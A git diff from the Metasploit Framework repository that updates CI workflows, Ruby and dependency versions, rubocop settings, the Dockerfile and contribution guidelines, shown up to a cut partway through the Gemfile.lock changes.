diff --git a/.github/workflows/command_shell_acceptance.yml b/.github/workflows/command_shell_acceptance.yml
index 269aec50a2612..6152d3dddf8fd 100644
--- a/.github/workflows/command_shell_acceptance.yml
+++ b/.github/workflows/command_shell_acceptance.yml
@@ -63,21 +63,23 @@ jobs:
fail-fast: false
matrix:
os:
- - windows-2019
- - ubuntu-20.04
+ - windows-2022
+ - ubuntu-latest
ruby:
- - '3.2'
+ - '3.4'
include:
# Powershell
- - { command_shell: { name: powershell }, os: windows-2019 }
- - { command_shell: { name: powershell }, os: windows-2022 }
+ - { command_shell: { name: powershell }, ruby: '3.4', os: windows-2022 }
+ - { command_shell: { name: powershell }, ruby: '3.4', os: windows-2025 }
# Linux
- - { command_shell: { name: linux }, os: ubuntu-20.04 }
+ - { command_shell: { name: linux }, ruby: '3.4', os: ubuntu-latest }
# CMD
- - { command_shell: { name: cmd }, os: windows-2019 }
- - { command_shell: { name: cmd }, os: windows-2022 }
+ - { command_shell: { name: cmd }, ruby: '3.4', os: windows-2022 }
+
+ # TODO: Tests currently fail:
+ # - { command_shell: { name: cmd }, ruby: '3.4', os: windows-2025 }
runs-on: ${{ matrix.os }}
@@ -126,10 +128,16 @@ jobs:
with:
path: metasploit-framework
- - name: Setup Ruby
- env:
- BUNDLE_FORCE_RUBY_PLATFORM: true
- uses: ruby/setup-ruby@v1
+ # https://github.com/orgs/community/discussions/26952
+ - name: Support longpaths
+ if: runner.os == 'Windows'
+ run: git config --system core.longpaths true
+
+ - name: Setup '${{ matrix.ruby }}' Ruby
+ # Skip for now to ensure CI passes on Windows server 2025 powershell tests
+ #env:
+ # BUNDLE_FORCE_RUBY_PLATFORM: true
+ uses: ruby/setup-ruby@eaecf785f6a34567a6d97f686bbb7bccc1ac1e5c
with:
ruby-version: ${{ matrix.ruby }}
bundler-cache: true
@@ -175,13 +183,19 @@ jobs:
if: always()
run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
+ # https://github.com/orgs/community/discussions/26952
+ - name: Support longpaths
+ if: runner.os == 'Windows'
+ run: git config --system core.longpaths true
+
- name: Setup Ruby
if: always()
env:
BUNDLE_FORCE_RUBY_PLATFORM: true
uses: ruby/setup-ruby@v1
with:
- ruby-version: '${{ matrix.ruby }}'
+ # use the default version from the .ruby-version file
+ ruby-version: '.ruby-version'
bundler-cache: true
cache-version: 4
diff --git a/.github/workflows/docs.yml b/.github/workflows/docs.yml
index 76abbeaef2152..963964edfdfc5 100644
--- a/.github/workflows/docs.yml
+++ b/.github/workflows/docs.yml
@@ -45,6 +45,11 @@ jobs:
- name: Checkout code
uses: actions/checkout@v4
+ # https://github.com/orgs/community/discussions/26952
+ - name: Support longpaths
+ if: runner.os == 'Windows'
+ run: git config --system core.longpaths true
+
- name: Setup Ruby
uses: ruby/setup-ruby@v1
with:
diff --git a/.github/workflows/ldap_acceptance.yml b/.github/workflows/ldap_acceptance.yml
index 9651487fc2ad3..a60944c6a6905 100644
--- a/.github/workflows/ldap_acceptance.yml
+++ b/.github/workflows/ldap_acceptance.yml
@@ -33,6 +33,8 @@ on:
- 'metsploit-framework.gemspec'
- 'Gemfile.lock'
- '**/**ldap**'
+ - 'lib/metasploit/framework/tcp/**'
+ - 'lib/metasploit/framework/login_scanner/**'
- 'spec/acceptance/**'
- 'spec/support/acceptance/**'
- 'spec/acceptance_spec_helper.rb'
@@ -72,6 +74,11 @@ jobs:
docker compose build
docker compose up --wait -d
+ # https://github.com/orgs/community/discussions/26952
+ - name: Support longpaths
+ if: runner.os == 'Windows'
+ run: git config --system core.longpaths true
+
- name: Setup Ruby
env:
# Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
@@ -121,6 +128,11 @@ jobs:
if: always()
run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
+ # https://github.com/orgs/community/discussions/26952
+ - name: Support longpaths
+ if: runner.os == 'Windows'
+ run: git config --system core.longpaths true
+
- name: Setup Ruby
if: always()
env:
diff --git a/.github/workflows/mssql_acceptance.yml b/.github/workflows/mssql_acceptance.yml
index f6542d56201f2..c2e948f8dbef3 100644
--- a/.github/workflows/mssql_acceptance.yml
+++ b/.github/workflows/mssql_acceptance.yml
@@ -82,6 +82,11 @@ jobs:
- name: Checkout code
uses: actions/checkout@v4
+ # https://github.com/orgs/community/discussions/26952
+ - name: Support longpaths
+ if: runner.os == 'Windows'
+ run: git config --system core.longpaths true
+
- name: Setup Ruby
env:
# Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
@@ -138,6 +143,11 @@ jobs:
if: always()
run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
+ # https://github.com/orgs/community/discussions/26952
+ - name: Support longpaths
+ if: runner.os == 'Windows'
+ run: git config --system core.longpaths true
+
- name: Setup Ruby
if: always()
env:
diff --git a/.github/workflows/mysql_acceptance.yml b/.github/workflows/mysql_acceptance.yml
index 9bd2c9efecf9a..1101dc9a418fc 100644
--- a/.github/workflows/mysql_acceptance.yml
+++ b/.github/workflows/mysql_acceptance.yml
@@ -80,6 +80,11 @@ jobs:
- name: Checkout code
uses: actions/checkout@v4
+ # https://github.com/orgs/community/discussions/26952
+ - name: Support longpaths
+ if: runner.os == 'Windows'
+ run: git config --system core.longpaths true
+
- name: Setup Ruby
env:
# Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
@@ -137,6 +142,11 @@ jobs:
if: always()
run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
+ # https://github.com/orgs/community/discussions/26952
+ - name: Support longpaths
+ if: runner.os == 'Windows'
+ run: git config --system core.longpaths true
+
- name: Setup Ruby
if: always()
env:
diff --git a/.github/workflows/postgres_acceptance.yml b/.github/workflows/postgres_acceptance.yml
index 0de893c76843f..d93f5d3f04490 100644
--- a/.github/workflows/postgres_acceptance.yml
+++ b/.github/workflows/postgres_acceptance.yml
@@ -33,6 +33,8 @@ on:
- 'metsploit-framework.gemspec'
- 'Gemfile.lock'
- '**/**postgres**'
+ - 'lib/metasploit/framework/tcp/**'
+ - 'lib/metasploit/framework/login_scanner/**'
- 'spec/acceptance/**'
- 'spec/support/acceptance/**'
- 'spec/acceptance_spec_helper.rb'
@@ -82,6 +84,11 @@ jobs:
- name: Checkout code
uses: actions/checkout@v4
+ # https://github.com/orgs/community/discussions/26952
+ - name: Support longpaths
+ if: runner.os == 'Windows'
+ run: git config --system core.longpaths true
+
- name: Setup Ruby
env:
# Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
@@ -139,6 +146,11 @@ jobs:
if: always()
run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
+ # https://github.com/orgs/community/discussions/26952
+ - name: Support longpaths
+ if: runner.os == 'Windows'
+ run: git config --system core.longpaths true
+
- name: Setup Ruby
if: always()
env:
diff --git a/.github/workflows/shared_gem_verify.yml b/.github/workflows/shared_gem_verify.yml
new file mode 100644
index 0000000000000..5ef5430453365
--- /dev/null
+++ b/.github/workflows/shared_gem_verify.yml
@@ -0,0 +1,69 @@
+name: Shared Gem Verify
+on:
+ workflow_call:
+ inputs:
+ test_commands:
+ description: 'Test commands'
+ required: false
+ default: "bundle exec rspec"
+ type: string
+ dependencies:
+ description: 'Array of system dependencies to install'
+ required: false
+ default: "[]"
+ type: string
+
+jobs:
+ test:
+ runs-on: ${{ matrix.os }}
+ timeout-minutes: 40
+
+ strategy:
+ fail-fast: false
+ matrix:
+ ruby:
+ - '3.2'
+ - '3.3'
+ - '3.4'
+ os:
+ - ubuntu-22.04
+ - ubuntu-24.04
+ - ubuntu-latest
+ - windows-2022
+ - windows-2025
+ - macos-13
+
+ env:
+ RAILS_ENV: test
+
+ name: ${{ matrix.os }} - Ruby ${{ matrix.ruby }}
+ steps:
+ - name: Install system dependencies
+ if: ${{ inputs.dependencies != '[]' && !contains(matrix.os, 'macos') && !contains(matrix.os, 'windows') }}
+ run: |
+ dependencies=$(echo '${{ inputs.dependencies }}' | jq -r '.[]')
+ for dep in $dependencies; do
+ sudo apt-get -y --no-install-recommends install "$dep"
+ done
+ shell: bash
+
+ - name: Install system dependencies (Windows)
+ if: ${{ contains(matrix.os, 'windows') && inputs.dependencies != '[]' }}
+ run: |
+ $dependencies = (echo '${{ inputs.dependencies }}' | jq -r '.[]')
+ foreach ($dep in $dependencies) {
+ choco install $dep -y
+ }
+ shell: pwsh
+
+ - name: Checkout code
+ uses: actions/checkout@v4
+
+ - name: Setup Ruby
+ uses: ruby/setup-ruby@v1
+ with:
+ ruby-version: ${{ matrix.ruby }}
+ bundler-cache: true
+
+ - name: Test
+ run: ${{ inputs.test_commands }}
diff --git a/.github/workflows/shared_gem_verify_rails.yml b/.github/workflows/shared_gem_verify_rails.yml
new file mode 100644
index 0000000000000..73ee576cf0c42
--- /dev/null
+++ b/.github/workflows/shared_gem_verify_rails.yml
@@ -0,0 +1,90 @@
+name: Shared Gem Verify Rails/PostgreSQL
+on:
+ workflow_call:
+ inputs:
+ test_commands:
+ description: 'Test commands'
+ required: false
+ default: "bundle exec rspec"
+ type: string
+ dependencies:
+ description: 'Array of system dependencies to install'
+ required: false
+ default: "[]"
+ type: string
+
+jobs:
+ test:
+ runs-on: ${{ matrix.os }}
+ timeout-minutes: 40
+
+ strategy:
+ fail-fast: false
+ matrix:
+ ruby:
+ - '3.2'
+ - '3.3'
+ - '3.4'
+ rails:
+ - '~> 7.0.0'
+ - '~> 7.1.0'
+ - '~> 7.2.0'
+ postgres:
+ - '9.6'
+ - '16.8'
+ os:
+ - ubuntu-latest
+
+ env:
+ RAILS_ENV: test
+
+ name: ${{ matrix.os }} - Ruby ${{ matrix.ruby }} - Rails ${{ matrix.rails }} - PostgreSQL ${{ matrix.postgres }}
+ steps:
+ - name: Install system dependencies
+ run: |
+ dependencies=$(echo '${{ inputs.dependencies }}' | jq -r '.[]')
+ for dep in $dependencies; do
+ sudo apt-get -y --no-install-recommends install "$dep"
+ done
+ shell: bash
+
+ - name: Set up PostgreSQL service
+ run: |
+ docker run --name postgres -d -p 5432:5432 \
+ -e POSTGRES_USER=postgres \
+ -e POSTGRES_PASSWORD=postgres \
+ --health-cmd="pg_isready" \
+ --health-interval="10s" \
+ --health-timeout="5s" \
+ --health-retries=5 \
+ postgres:${{ matrix.postgres }}
+
+ - name: Wait for PostgreSQL to be healthy
+ run: |
+ docker exec postgres sh -c 'until pg_isready -U postgres; do echo waiting for postgres; sleep 2; done; echo postgres is ready'
+
+ - name: Checkout code
+ uses: actions/checkout@v4
+
+ - name: Setup Ruby
+ uses: ruby/setup-ruby@v1
+ with:
+ ruby-version: ${{ matrix.ruby }}
+ bundler-cache: true
+
+ - name: Update Rails version
+ run: |
+ # Add the gem explicitly if it doesn't exist
+ if ! grep -q "gem ['\"]rails['\"]" Gemfile; then
+ echo 'gem "rails"' >> Gemfile
+ fi
+
+ # Ensure the gem is on the latest version
+ ruby -pi -e "gsub(/gem ['\"]rails['\"](, *['\"].*['\"])?/, \"gem 'rails', '${{ matrix.rails }}'\")" Gemfile
+ bundle update
+ bundle install
+ bundle show rails
+ shell: bash
+
+ - name: Test
+ run: ${{ inputs.test_commands }}
diff --git a/.github/workflows/shared_meterpreter_acceptance.yml b/.github/workflows/shared_meterpreter_acceptance.yml
index f79b650064736..a5f8af6f5306e 100644
--- a/.github/workflows/shared_meterpreter_acceptance.yml
+++ b/.github/workflows/shared_meterpreter_acceptance.yml
@@ -68,13 +68,13 @@ jobs:
matrix:
os:
- macos-13
- - windows-2019
- - ubuntu-20.04
+ - windows-2022
+ - ubuntu-latest
ruby:
- - '3.2'
+ - '3.4'
meterpreter:
# Python
- - { name: python, runtime_version: 3.6 }
+ - { name: python, runtime_version: 3.8 }
- { name: python, runtime_version: 3.11 }
# Java
@@ -87,12 +87,13 @@ jobs:
- { name: php, runtime_version: 8.3 }
include:
# Windows Meterpreter
- - { meterpreter: { name: windows_meterpreter }, os: windows-2019 }
- - { meterpreter: { name: windows_meterpreter }, os: windows-2022 }
+ - { meterpreter: { name: windows_meterpreter }, ruby: '3.4', os: windows-2022 }
+ # TODO: Screenshotting behavior fails:
+ # - { meterpreter: { name: windows_meterpreter }, ruby: '3.4', os: windows-2025 }
# Mettle
- { meterpreter: { name: mettle }, os: macos-13 }
- - { meterpreter: { name: mettle }, os: ubuntu-20.04 }
+ - { meterpreter: { name: mettle }, os: ubuntu-latest }
runs-on: ${{ matrix.os }}
@@ -190,12 +191,18 @@ jobs:
path: metasploit-framework
ref: ${{ inputs.metasploit_framework_commit }}
+ # https://github.com/orgs/community/discussions/26952
+ - name: Support longpaths
+ if: runner.os == 'Windows'
+ run: git config --system core.longpaths true
+
- name: Setup Ruby
env:
BUNDLE_FORCE_RUBY_PLATFORM: true
# Required for macos13 pg gem compilation
PKG_CONFIG_PATH: "/usr/local/opt/libpq/lib/pkgconfig"
- uses: ruby/setup-ruby@v1
+ # Pinned to avoid Windows compilation failure with nokogiri
+ uses: ruby/setup-ruby@eaecf785f6a34567a6d97f686bbb7bccc1ac1e5c
with:
ruby-version: ${{ matrix.ruby }}
bundler-cache: true
@@ -269,6 +276,15 @@ jobs:
make.bat
working-directory: metasploit-payloads
+ - name: Build Windows payloads via Visual Studio 2025 Build (Windows)
+ shell: cmd
+ if: ${{ matrix.meterpreter.name == 'windows_meterpreter' && matrix.os == 'windows-2025' && inputs.build_metasploit_payloads }}
+ run: |
+ cd c/meterpreter
+ git submodule init && git submodule update
+ make.bat
+ working-directory: metasploit-payloads
+
- name: Get metasploit-payloads version
if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
shell: bash
@@ -344,11 +360,16 @@ jobs:
if: always()
run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
+ # https://github.com/orgs/community/discussions/26952
+ - name: Support longpaths
+ if: runner.os == 'Windows'
+ run: git config --system core.longpaths true
+
- name: Setup Ruby
if: always()
env:
BUNDLE_FORCE_RUBY_PLATFORM: true
- uses: ruby/setup-ruby@v1
+ uses: ruby/setup-ruby@eaecf785f6a34567a6d97f686bbb7bccc1ac1e5c
with:
ruby-version: '3.3'
bundler-cache: true
diff --git a/.github/workflows/shared_smb_acceptance.yml b/.github/workflows/shared_smb_acceptance.yml
index cf8c127093fef..7639a93b73425 100644
--- a/.github/workflows/shared_smb_acceptance.yml
+++ b/.github/workflows/shared_smb_acceptance.yml
@@ -74,6 +74,11 @@ jobs:
docker compose build
docker compose up --wait -d
+ # https://github.com/orgs/community/discussions/26952
+ - name: Support longpaths
+ if: runner.os == 'Windows'
+ run: git config --system core.longpaths true
+
- name: Setup Ruby
env:
# Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
@@ -143,6 +148,11 @@ jobs:
if: always()
run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
+ # https://github.com/orgs/community/discussions/26952
+ - name: Support longpaths
+ if: runner.os == 'Windows'
+ run: git config --system core.longpaths true
+
- name: Setup Ruby
if: always()
env:
diff --git a/.github/workflows/verify.yml b/.github/workflows/verify.yml
index 87ce8e7b305ab..33c4438b00717 100644
--- a/.github/workflows/verify.yml
+++ b/.github/workflows/verify.yml
@@ -64,7 +64,6 @@ jobs:
- '3.3'
- '3.4'
os:
- - ubuntu-20.04
- ubuntu-latest
include:
- os: ubuntu-latest
@@ -89,6 +88,11 @@ jobs:
- name: Checkout code
uses: actions/checkout@v4
+ # https://github.com/orgs/community/discussions/26952
+ - name: Support longpaths
+ if: runner.os == 'Windows'
+ run: git config --system core.longpaths true
+
- name: Setup Ruby
env:
# Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
diff --git a/.rubocop.yml b/.rubocop.yml
index ca58a6fce339d..bb9824ecd1040 100644
--- a/.rubocop.yml
+++ b/.rubocop.yml
@@ -23,12 +23,10 @@ require:
- ./lib/rubocop/cop/lint/deprecated_gem_version.rb
- ./lib/rubocop/cop/lint/module_enforce_notes.rb
- ./lib/rubocop/cop/lint/detect_invalid_pack_directives.rb
+ - ./lib/rubocop/cop/lint/detect_metadata_trailing_leading_whitespace.rb
Layout/SpaceBeforeBrackets:
- Description: >-
- Disabled as it generates invalid code:
- https://github.com/rubocop-hq/rubocop/issues/9499
- Enabled: false
+ Enabled: true
Lint/AmbiguousAssignment:
Enabled: true
@@ -116,6 +114,12 @@ Style/DocumentDynamicEvalDefinition:
Style/EndlessMethod:
Enabled: true
+Style/FormatStringToken:
+ Enabled: true
+ Exclude:
+ # We aren't ready to enable this for modules yet
+ - 'modules/**/*'
+
Style/HashExcept:
Enabled: true
@@ -155,9 +159,26 @@ Style/RedundantAssignment:
and return expression
Enabled: false
+Style/RedundantParentheses:
+ Description: >-
+ Disabled as it sometimes improves the readability of code
+ Enabled: false
+
+Style/RedundantRegexpArgument:
+ Enabled: true
+ Exclude:
+ # We aren't ready to enable this for modules yet
+ - 'modules/**/*'
+
Style/SwapValues:
Enabled: false
+Layout/LineContinuationLeadingSpace:
+ Description: >-
+ Disabled as it sometimes improves the readability of code having leading spaces
+ for indented code strings.
+ Enabled: false
+
Layout/ModuleHashOnNewLine:
Enabled: true
@@ -652,3 +673,6 @@ Style/UnpackFirst:
Disabling to make it easier to copy/paste `unpack('h*')` expressions from code
into a debugging REPL.
Enabled: false
+
+Lint/DetectMetadataTrailingLeadingWhitespace:
+ Enabled: true
diff --git a/.ruby-version b/.ruby-version
index 5ae69bd5f0e84..37d02a6e3801e 100644
--- a/.ruby-version
+++ b/.ruby-version
@@ -1 +1 @@
-3.2.5
+3.3.8
diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md
index 09ee6faa51633..77efd0f534e5b 100644
--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -22,6 +22,8 @@ Once you have finished your new module and tested it locally to ensure it's work
Finally, follow our short list of do's and don'ts below to make sure your valuable contributions actually make it into Metasploit's master branch! We try to consider all our pull requests fairly and in detail, but if you do not follow these rules, your contribution
will be closed. We need to ensure the code we're adding to master is written to a high standard.
+## Expedited Module Creation Process
+We strive to respect the community that has given us so much, so in the odd situation where we get multiple submissions for the same vulnerability, generally we will work with the first person who assigns themselves to the issue or the first person that submits a good-faith PR. A good-faith PR might not even work, but it will show that the author is working their way toward a solution. Despite this general rule, there are rare circumstances where we may ask a contributor to step aside or allow a committer to take the lead on the creation of a new module if a complete and working module with documents has not already been submitted. This kind of expedited module creation process comes up infrequently, and usually it involves high-profile or high priority modules that we have marked internally as time-critical: think KEV list, active exploitation campaigns, CISA announcements, etc. In those cases, we may ask a contributor that is assigned to the issue or who has submitted an incomplete module to allow a committer to take over an issue or a module PR in the interest of getting a module out quickly. If a contributor has submitted an incomplete module, they will remain as a co-author of the module and we may build directly onto the PR they submitted, leaving the original commits in the tree. We sincerely hope that the original author will remain involved in this expedited module creation process. We would appreciate testing, critiquing, and any assistance that can be offered. If the module is complete but requires minor changes, we may ask the contributor to allow us to take over testing/verification and make these minor changes without asking so we can land the module as quickly as possible. In these cases of minor code changes, the authorship of the module will remain unchanged. We hope everyone involved in this expedited module creation process continues to feel valued and appreciated.
### Code Contribution Do's & Don'ts:
@@ -40,13 +42,18 @@ Keeping the following in mind gives your contribution the best chance of landing
* **Do** target your pull request to the **master branch**.
* **Do** specify a descriptive title to make searching for your pull request easier.
* **Do** include [console output], especially for effects that can be witnessed in the `msfconsole`.
-* **Do** list [verification steps] so your code is testable.
+* **Do** test your code.
+* **Do** list [verification steps] so committers can test your code.
* **Do** [reference associated issues] in your pull request description.
* **Don't** leave your pull request description blank.
+* **Don't** include sensitive information in your PR (including externally-routable IP addresses in documentation).
+* **Don't** PR untested/unvalidated code you copy/pasted from the internet.
+* **Don't** PR untested/unvalidated code you copy/pasted from AI or LLM.
* **Don't** abandon your pull request. Being responsive helps us land your code faster.
* **Don't** post questions in older closed PRs.
#### New Modules
+* **Do** check the issue tracker to see if there is a `suggestion-module` issue for the module you want to write, and assign yourself to it if there is.
* **Do** license your code as BSD 3-clause, BSD 2-clause, or MIT.
* **Do** stick to the [Ruby style guide] and use [Rubocop] to find common style issues.
* **Do** set up `msftidy` to fix any errors or warnings that come up as a [pre-commit hook].
diff --git a/COPYING b/COPYING
index a2a0197ece27b..ed16b933a43c1 100644
--- a/COPYING
+++ b/COPYING
@@ -1,4 +1,4 @@
-Copyright (C) 2006-2020, Rapid7, Inc.
+Copyright (C) 2006-2025, Rapid7, Inc.
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
diff --git a/Dockerfile b/Dockerfile
index 1870ea5c24050..5e36e4dbdd2e0 100644
--- a/Dockerfile
+++ b/Dockerfile
@@ -1,7 +1,7 @@
-FROM ruby:3.2.5-alpine3.20 AS builder
+FROM ruby:3.3.8-alpine3.21 AS builder
LABEL maintainer="Rapid7"
-ARG BUNDLER_CONFIG_ARGS="set no-cache 'true' set system 'true' set without 'development test coverage'"
+ARG BUNDLER_CONFIG_ARGS="set force_ruby_platform 'true' set no-cache 'true' set system 'true' set without 'development test coverage'"
ARG BUNDLER_FORCE_CLEAN="true"
ENV APP_HOME=/usr/src/metasploit-framework
ENV TOOLS_HOME=/usr/src/tools
@@ -24,6 +24,7 @@ RUN apk add --no-cache \
readline-dev \
sqlite-dev \
postgresql-dev \
+ libffi-dev \
libpcap-dev \
libxml2-dev \
libxslt-dev \
@@ -47,13 +48,13 @@ RUN apk add --no-cache \
ENV GO111MODULE=off
RUN mkdir -p $TOOLS_HOME/bin && \
cd $TOOLS_HOME/bin && \
- curl -O https://dl.google.com/go/go1.21.1.src.tar.gz && \
- tar -zxf go1.21.1.src.tar.gz && \
- rm go1.21.1.src.tar.gz && \
+ curl -O https://dl.google.com/go/go1.24.0.src.tar.gz && \
+ tar -zxf go1.24.0.src.tar.gz && \
+ rm go1.24.0.src.tar.gz && \
cd go/src && \
./make.bash
-FROM ruby:3.2.5-alpine3.20
+FROM ruby:3.3.8-alpine3.21
LABEL maintainer="Rapid7"
ARG TARGETARCH
diff --git a/Gemfile b/Gemfile
index 83b7b2811fbd5..f25d0d903ba14 100644
--- a/Gemfile
+++ b/Gemfile
@@ -24,27 +24,29 @@ group :development do
# memory profiling
gem 'memory_profiler'
# cpu profiling
- gem 'ruby-prof', '1.4.2'
+ gem 'ruby-prof'
# Metasploit::Aggregator external session proxy
# disabled during 2.5 transition until aggregator is available
# gem 'metasploit-aggregator'
end
group :development, :test do
+ # For ./tools/dev/update_gem_licenses.sh
+ gem 'license_finder', '5.11.1'
# running documentation generation tasks and rspec tasks
gem 'rake'
# Define `rake spec`. Must be in development AND test so that its available by default as a rake test when the
# environment is development
- gem 'rspec-rails'
+ gem 'rspec-rails', '>= 8.0.0'
gem 'rspec-rerun'
# Required during CI as well local development
- gem 'rubocop'
+ gem 'rubocop', '1.75.7'
end
group :test do
# automatically include factories from spec/factories
gem 'test-prof'
- gem 'factory_bot_rails'
+ gem 'factory_bot_rails', '>= 6.5.0'
# Make rspec output shorter and more useful
gem 'fivemat'
# rspec formatter for acceptance tests
diff --git a/Gemfile.lock b/Gemfile.lock
index 1c6294012f10a..9c74437dbb3a9 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -1,12 +1,12 @@
PATH
remote: .
specs:
- metasploit-framework (6.4.52)
+ metasploit-framework (6.4.76)
aarch64
abbrev
- actionpack (~> 7.0.0)
- activerecord (~> 7.0.0)
- activesupport (~> 7.0.0)
+ actionpack (~> 7.1.0)
+ activerecord (~> 7.1.0)
+ activesupport (~> 7.1.0)
aws-sdk-ec2
aws-sdk-ec2instanceconnect
aws-sdk-iam
@@ -38,16 +38,17 @@ PATH
getoptlong
hrr_rb_ssh-ed25519
http-cookie
- irb (~> 1.7.4)
+ irb
jsobfu
json
+ lru_redux
metasm
metasploit-concern
metasploit-credential
metasploit-model
- metasploit-payloads (= 2.0.189)
- metasploit_data_models
- metasploit_payloads-mettle (= 1.0.35)
+ metasploit-payloads (= 2.0.221)
+ metasploit_data_models (>= 6.0.7)
+ metasploit_payloads-mettle (= 1.0.42)
mqtt
msgpack (~> 1.6.0)
mutex_m
@@ -71,7 +72,7 @@ PATH
pg
puma
railties
- rasn1 (= 0.13.0)
+ rasn1 (= 0.14.0)
rb-readline
recog
redcarpet
@@ -94,15 +95,18 @@ PATH
rex-struct2
rex-text
rex-zip
+ rinda
ruby-macho
ruby-mysql
- ruby_smb (~> 3.3.3)
+ ruby_smb (~> 3.3.15)
rubyntlm
rubyzip
sinatra
sqlite3 (= 1.7.3)
sshkey
+ stringio (= 3.1.1)
swagger-blocks
+ syslog
thin
tzinfo
tzinfo-data
@@ -118,103 +122,118 @@ PATH
GEM
remote: https://rubygems.org/
specs:
- Ascii85 (1.1.1)
+ Ascii85 (2.0.1)
aarch64 (2.1.0)
racc (~> 1.6)
abbrev (0.1.2)
- actionpack (7.0.8.6)
- actionview (= 7.0.8.6)
- activesupport (= 7.0.8.6)
- rack (~> 2.0, >= 2.2.4)
+ actionpack (7.1.5.1)
+ actionview (= 7.1.5.1)
+ activesupport (= 7.1.5.1)
+ nokogiri (>= 1.8.5)
+ racc
+ rack (>= 2.2.4)
+ rack-session (>= 1.0.1)
rack-test (>= 0.6.3)
- rails-dom-testing (~> 2.0)
- rails-html-sanitizer (~> 1.0, >= 1.2.0)
- actionview (7.0.8.6)
- activesupport (= 7.0.8.6)
+ rails-dom-testing (~> 2.2)
+ rails-html-sanitizer (~> 1.6)
+ actionview (7.1.5.1)
+ activesupport (= 7.1.5.1)
builder (~> 3.1)
- erubi (~> 1.4)
- rails-dom-testing (~> 2.0)
- rails-html-sanitizer (~> 1.1, >= 1.2.0)
- activemodel (7.0.8.6)
- activesupport (= 7.0.8.6)
- activerecord (7.0.8.6)
- activemodel (= 7.0.8.6)
- activesupport (= 7.0.8.6)
- activesupport (7.0.8.6)
+ erubi (~> 1.11)
+ rails-dom-testing (~> 2.2)
+ rails-html-sanitizer (~> 1.6)
+ activemodel (7.1.5.1)
+ activesupport (= 7.1.5.1)
+ activerecord (7.1.5.1)
+ activemodel (= 7.1.5.1)
+ activesupport (= 7.1.5.1)
+ timeout (>= 0.4.0)
+ activesupport (7.1.5.1)
+ base64
+ benchmark (>= 0.3)
+ bigdecimal
concurrent-ruby (~> 1.0, >= 1.0.2)
+ connection_pool (>= 2.2.5)
+ drb
i18n (>= 1.6, < 2)
+ logger (>= 1.4.2)
minitest (>= 5.1)
+ mutex_m
+ securerandom (>= 0.3)
tzinfo (~> 2.0)
addressable (2.8.7)
public_suffix (>= 2.0.2, < 7.0)
afm (0.2.2)
- allure-rspec (2.24.5)
- allure-ruby-commons (= 2.24.5)
+ allure-rspec (2.26.0)
+ allure-ruby-commons (= 2.26.0)
rspec-core (>= 3.8, < 4)
- allure-ruby-commons (2.24.5)
+ allure-ruby-commons (2.26.0)
mime-types (>= 3.3, < 4)
require_all (>= 2, < 4)
rspec-expectations (~> 3.12)
- uuid (>= 2.3, < 3)
- arel-helpers (2.15.0)
- activerecord (>= 3.1.0, < 8)
- ast (2.4.2)
- aws-eventstream (1.3.0)
- aws-partitions (1.999.0)
- aws-sdk-core (3.211.0)
+ arel-helpers (2.16.0)
+ activerecord (>= 3.1.0, < 8.1)
+ ast (2.4.3)
+ aws-eventstream (1.3.2)
+ aws-partitions (1.1065.0)
+ aws-sdk-core (3.220.1)
aws-eventstream (~> 1, >= 1.3.0)
aws-partitions (~> 1, >= 1.992.0)
aws-sigv4 (~> 1.9)
+ base64
jmespath (~> 1, >= 1.6.1)
- aws-sdk-ec2 (1.486.0)
- aws-sdk-core (~> 3, >= 3.210.0)
+ aws-sdk-ec2 (1.511.0)
+ aws-sdk-core (~> 3, >= 3.216.0)
aws-sigv4 (~> 1.5)
- aws-sdk-ec2instanceconnect (1.52.0)
- aws-sdk-core (~> 3, >= 3.210.0)
+ aws-sdk-ec2instanceconnect (1.55.0)
+ aws-sdk-core (~> 3, >= 3.216.0)
aws-sigv4 (~> 1.5)
- aws-sdk-iam (1.112.0)
- aws-sdk-core (~> 3, >= 3.210.0)
+ aws-sdk-iam (1.119.0)
+ aws-sdk-core (~> 3, >= 3.216.0)
aws-sigv4 (~> 1.5)
- aws-sdk-kms (1.95.0)
- aws-sdk-core (~> 3, >= 3.210.0)
+ aws-sdk-kms (1.99.0)
+ aws-sdk-core (~> 3, >= 3.216.0)
aws-sigv4 (~> 1.5)
- aws-sdk-s3 (1.169.0)
- aws-sdk-core (~> 3, >= 3.210.0)
+ aws-sdk-s3 (1.182.0)
+ aws-sdk-core (~> 3, >= 3.216.0)
aws-sdk-kms (~> 1)
aws-sigv4 (~> 1.5)
- aws-sdk-ssm (1.183.0)
- aws-sdk-core (~> 3, >= 3.210.0)
+ aws-sdk-ssm (1.191.0)
+ aws-sdk-core (~> 3, >= 3.216.0)
aws-sigv4 (~> 1.5)
- aws-sigv4 (1.10.1)
+ aws-sigv4 (1.11.0)
aws-eventstream (~> 1, >= 1.0.2)
base64 (0.2.0)
bcrypt (3.1.20)
bcrypt_pbkdf (1.1.1)
- benchmark (0.4.0)
- bigdecimal (3.1.8)
+ benchmark (0.4.1)
+ bigdecimal (3.2.2)
bindata (2.4.15)
bootsnap (1.18.4)
msgpack (~> 1.2)
- bson (5.0.1)
+ bson (5.0.2)
builder (3.3.0)
byebug (11.1.3)
chunky_png (1.4.0)
coderay (1.1.3)
concurrent-ruby (1.3.4)
+ connection_pool (2.5.3)
cookiejar (0.3.4)
crass (1.0.6)
- csv (3.3.0)
